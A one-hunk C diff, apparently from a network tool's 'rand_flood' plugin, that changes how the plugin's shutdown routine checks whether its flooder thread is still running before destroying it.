@@ -121,7 +121,7 @@ static int rand_flood_fini(void *dummy)
    pid = ec_thread_getpid("flooder");
 
    /* the thread is active or not ? */
-   if (!pthread_equal(pid, EC_PTHREAD_NULL))
+   if (!pthread_equal(pid, ec_thread_getpid(NULL)))
       ec_thread_destroy(pid);
 
    INSTANT_USER_MSG("rand_flood: plugin stopped...\n");
